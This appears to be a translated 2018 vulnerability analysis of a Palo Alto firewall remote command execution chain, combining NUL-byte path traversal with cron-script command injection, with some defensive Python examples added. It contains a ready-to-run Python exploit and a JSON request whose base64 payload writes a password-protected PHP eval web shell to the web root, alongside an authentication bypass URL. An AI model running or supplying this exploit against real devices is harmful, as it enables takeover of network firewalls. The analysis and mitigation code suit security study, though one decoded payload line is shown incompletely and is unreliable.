
Key technical analysis of the Palo Alto remote command execution vulnerability (final part)

Source: compiled by this site  Author: anonymous  Date: 2018-03-08

4. The logic of PanDirect->execute($params) is as follows:
1) checkValidRemoteCall checks the class, the method, and whether the method is static;
2) $obj = $reflection->newInstanceArgs(array($jsonArgs)); instantiates the Administrator class;
3) $obj->$method(); calls the Administrator class's get method.

5. The Administrator.get method calls Direct::getConfigByXpath(), which produces the XML shown in a figure in the original post (not reproduced here).

6. Finally, the writeaPayload function in MSCommection.php sends the XML string to the backend process mgmtsrvr.
7. The data received by the pan_mgmtsrvr_client_svc function in mgmtsrvr is shown in a figure in the original post (not reproduced here). After /tmp/hacked'/> there is a NUL byte, which truncates the data at that point.

8. Finally, the pan_jobmgr_store_job_result function in libpanmp_mp.so.1 follows the traversal path and creates the /tmp/hacked directory.
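Steps 7 and 8 rest on two defects: the backend reads the forwarded data as a C string and stops at the embedded NUL byte, so it sees a different value than the PHP front end did, and the job-result code then trusts the traversing path it was handed. The Python below is an added illustration, not code from the appliance or from the original article, of how a length-aware layer and a C-string consumer disagree about the same bytes, and of the single input check that blocks both defects. The function names, the jobs directory and SAMPLE_PAYLOAD are assumptions constructed to match the shape described above.

```python
import os

# Constructed sample of the forwarded data, matching the shape described in
# step 7: a traversing path, a quote that closes the XML attribute, a NUL
# byte, then the rest of the document the front end still saw.
SAMPLE_PAYLOAD = b"../../../../../../tmp/hacked'/>\x00 more-xml-after-the-nul"


def c_string_view(buf):
    """The bytes a C-string consumer (strlen, strcpy, open) actually uses:
    everything before the first NUL byte."""
    nul = buf.find(b"\x00")
    return buf if nul == -1 else buf[:nul]


def layers_disagree(buf):
    """True when a length-aware layer (PHP strings, JSON) and a C-string layer
    would see different content, i.e. the buffer holds an embedded NUL."""
    return c_string_view(buf) != buf


def safe_job_path(base_dir, name):
    """Join base_dir with a single attacker-influenced component. Rejects NUL
    bytes, empty and dot components and separators, then re-checks that the
    normalised result is still inside base_dir (defence in depth).
    Function and directory names here are assumptions, not the appliance's."""
    if isinstance(name, bytes):
        name = name.decode("utf-8")
    if "\x00" in name:
        raise ValueError("NUL byte in path component")
    if name in ("", ".", "..") or "/" in name or "\\" in name:
        raise ValueError("invalid path component: %r" % name)
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes base directory")
    return candidate


if __name__ == "__main__":
    print("front end sees %d bytes, backend C code sees %d" %
          (len(SAMPLE_PAYLOAD), len(c_string_view(SAMPLE_PAYLOAD))))
    print("layers disagree:", layers_disagree(SAMPLE_PAYLOAD))
    for component in ("job-17", "../../../../../../tmp/hacked", "hacked'/>\x00"):
        try:
            print(component.encode("unicode_escape"), "->",
                  safe_job_path("/opt/pancfg/mgmt/jobs", component))
        except ValueError as exc:
            print(component.encode("unicode_escape"), "-> rejected:", exc)
```

The NUL check has to run on the full, length-delimited value before it is handed to any C API; once the bytes have crossed into a NUL-terminated string the truncated remainder is gone and nothing downstream can detect it.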

(III) Command execution
1. Look at the files under /etc/cron.d/, the directory that holds system-level cron job files. It contains an indexgen file that runs the genindex_batch.sh script at minutes 0, 15, 30 and 45 of every hour:
SHELL=/bin/bash
0,15,30,45 * * * * root /usr/local/bin/genindex_batch.sh
genindex_batch.sh in turn calls the /usr/local/bin/genindex.sh script.
2. The key code in genindex.sh that leads to command execution is shown in a figure in the original post (not reproduced here), where PAN_BASE_DIR=/opt/pancfg/mgmt.

3. Command execution
1) Using the directory-creation vulnerability, send
{"action":"PanDirect","method":"execute","data":["07c5807d0d927dcd0980f86024e5208b","Administrator.get",{"changeMyPassword":true,"template":"asd","id":"admin']\" async-mode='yes' refresh='yes' cookie='../../../../../../opt/pancfg/mgmt/logdb/traffic/1/* -print -exec python -c exec(\"Zj1vcGVuKCcvdmFyL2FwcHdlYi9odGRvY3MvdnVkcmMucGhwJywgJ3cnKTtmLndyaXRlKCI8P3BocCBAZXZhbCgkX1BPU1RbJ2NodnVjMDEwJ10pOz8+Iik7Zi5jbG9zZSgpOw==\".decode(\"base64\")) ;'/>\u0000"}],"type":"rpc","tid":713}
2) This creates the directory /opt/pancfg/mgmt/logdb/traffic/1/* -print -exec python -c exec("Zj1vcGVuKCcvdmFyL2FwcHdlYi9odGRvY3MvdnVkcmMucGhwJywgJ3cnKTtmLndyaXRlKCI8P3BocCBAZXZhbCgkX1BPU1RbJ2NodnVjMDEwJ10pOz8+Iik7Zi5jbG9zZSgpOw==".decode("base64")) ;, where the base64 data decodes to f=open('/var/appweb/htdocs/vudrc.php', 'w');f.write("");f.close();
3) When genindex.sh runs, the command `find $day -mmin +5 -name pan.*.log | sort -r` becomes `find /opt/pancfg/mgmt/logdb/traffic/1/* -print -exec python -c exec("Zj1vcGVuKCcvdmFyL2FwcHdlYi9odGRvY3MvdnVkcmMucGhwJywgJ3cnKTtmLndyaXRlKCI8P3BocCBAZXZhbCgkX1BPU1RbJ2NodnVjMDEwJ10pOz8+Iik7Zi5jbG9zZSgpOw==".decode("base64")) ; -mmin +5 -name pan.*.log | sort -r`, which is a command injection.
4) After at most 15 minutes, a one-line web shell with the password chvuc010 has been written to /var/appweb/htdocs/vudrc.php.
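The injection in step 3 works because genindex.sh expands $day unquoted: the shell splits the directory name on spaces, and every piece becomes a separate find argument. The Python below is an added example, not the appliance's genindex.sh and not code from the original post, that rebuilds the same scheduled task without a shell: an argv list keeps the directory name as one argument however it is spelled, and a pure-Python variant removes find altogether. PAN_BASE_DIR is the value the analysis quotes; the fixture directory name (which carries find-expression tokens but only a harmless echo), the FIXTURE_TIME constant and the function names are constructed for this example.

```python
import os
import re
import shlex
import tempfile
import time

# Constructed example; not the appliance's genindex.sh.
PAN_BASE_DIR = "/opt/pancfg/mgmt"             # value quoted in the analysis
LOG_NAME = re.compile(r"^pan\..*\.log$")      # same filter as -name pan.*.log
FIXTURE_TIME = 1700000000                     # fixed "now" for the constructed fixture


def build_find_argv(day_dir, min_age_minutes=5):
    """argv list for `find DAY -mmin +N -name pan.*.log`, for subprocess.run()
    without shell=True: the directory name is exactly one element, so spaces
    or find-expression tokens inside it can never become extra arguments."""
    return ["find", day_dir, "-mmin", "+%d" % min_age_minutes, "-name", "pan.*.log"]


def shell_word_count(day_dir):
    """How many words the unquoted shell form splits into. shlex.split is only
    an approximation of sh's IFS splitting, but it shows the mechanism: every
    space in the directory name starts a new find argument."""
    return len(shlex.split("find %s -mmin +5 -name pan.*.log" % day_dir))


def stale_logs(day_dir, min_age_minutes=5, now=None):
    """Pure-Python replacement for the find | sort -r pipeline: pan.*.log files
    under day_dir last modified more than min_age_minutes ago, in reverse
    lexical order. No command line is built, so the name is only ever data."""
    now = time.time() if now is None else now
    cutoff = now - min_age_minutes * 60
    found = []
    for root, _dirs, files in os.walk(day_dir):
        for name in files:
            if LOG_NAME.match(name):
                path = os.path.join(root, name)
                if os.stat(path).st_mtime < cutoff:
                    found.append(path)
    return sorted(found, reverse=True)


def make_fixture():
    """Constructed fixture under a temp dir: a day directory whose name carries
    find-expression tokens (the shape the analysis describes, with a harmless
    echo), one stale log, one fresh log and one non-log file."""
    root = tempfile.mkdtemp(prefix="logdb-example-")
    day_dir = os.path.join(root, "1 -print -exec echo injected ;")
    os.mkdir(day_dir)
    stale = os.path.join(day_dir, "pan.1.log")
    fresh = os.path.join(day_dir, "pan.2.log")
    other = os.path.join(day_dir, "notes.txt")
    for path, mtime in ((stale, FIXTURE_TIME - 600),
                        (fresh, FIXTURE_TIME - 60),
                        (other, FIXTURE_TIME - 600)):
        with open(path, "w") as fh:
            fh.write("sample\n")
        os.utime(path, (mtime, mtime))
    return day_dir, stale, fresh


if __name__ == "__main__":
    day_dir, stale, _fresh = make_fixture()
    print("unquoted shell form splits into %d words" % shell_word_count(day_dir))
    print("argv form has %d arguments" % len(build_find_argv(day_dir)))
    print("stale logs:", stale_logs(day_dir, now=FIXTURE_TIME))
```

In the shell script itself the equivalent fix is to quote the expansion, `find "$day" -mmin +5 -name 'pan.*.log'`, so that the directory name is passed to find as a single path; the argv-list form above is the same idea expressed in a language that has no word splitting to begin with. Either way the creation of an oddly named directory under logdb remains an event worth alerting on, since legitimate log directories there never contain whitespace.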
(IV) PoC
import urllib2
import ssl
import sys

ssl._create_default_https_context = ssl._create_unverified_context

domain = "192.168.1.1"

# pass auth
print "step 1: pass_auth"
pass_auth_url = "https://" + domain + "/esp/cms_changeDeviceContext.esp?device=1024:bbbb'\";user|s:"
print "pass_auth request:    " + pass_auth_url
request = urllib2.Request(pass_auth_url)
response = urllib2.urlopen(request)
print "pass_auth response:    " + response.read()
session_start_index = response.headers['Set-Cookie'].find("PHPSESSID")
if session_start_index == -1:
    print "pass_auth fail!!"
    sys.exit()
session = response.headers['Set-Cookie'][session_start_index:]
session = session[:session.find(';')]
auth_headers = {'Cookie': session, 'Connection': 'keep-alive'}
print "\n"

print "step 2: check if pass auth"
auth_url = "https://" + domain + "/php/utils/debug.php"
print "auth_url request:    " + auth_url
request = urllib2.Request(auth_url, headers=auth_headers)
response = urllib2.urlopen(request)
content = response.read()
# print content
if "Debug" not in content:
    print "pass auth fail!!"
    sys.exit()
print "pass auth success!!"
print "\n"

print "step 3: create dir"
create_dir_url = "https://" + domain + "/php/utils/router.php/Administrator.get"
print "create_dir request:    " + create_dir_url
post_data = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../opt/pancfg/mgmt/logdb/traffic/1/* -print -exec python -c exec(\\\"Zj1vcGVuKCcvdmFyL2FwcHdlYi9odGRvY3MvdnVkcmMucGhwJywgJ3cnKTtmLndyaXRlKCI8P3BocCBAZXZhbCgkX1BPU1RbJ2NodnVjMDEwJ10pOz8+Iik7Zi5jbG9zZSgpOw==\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
request = urllib2.Request(create_dir_url, headers=auth_headers, data=post_data)
response = urllib2.urlopen(request)
print "\n"
print "15 minutes later, visit https://" + domain + "/vudrc.php"
 

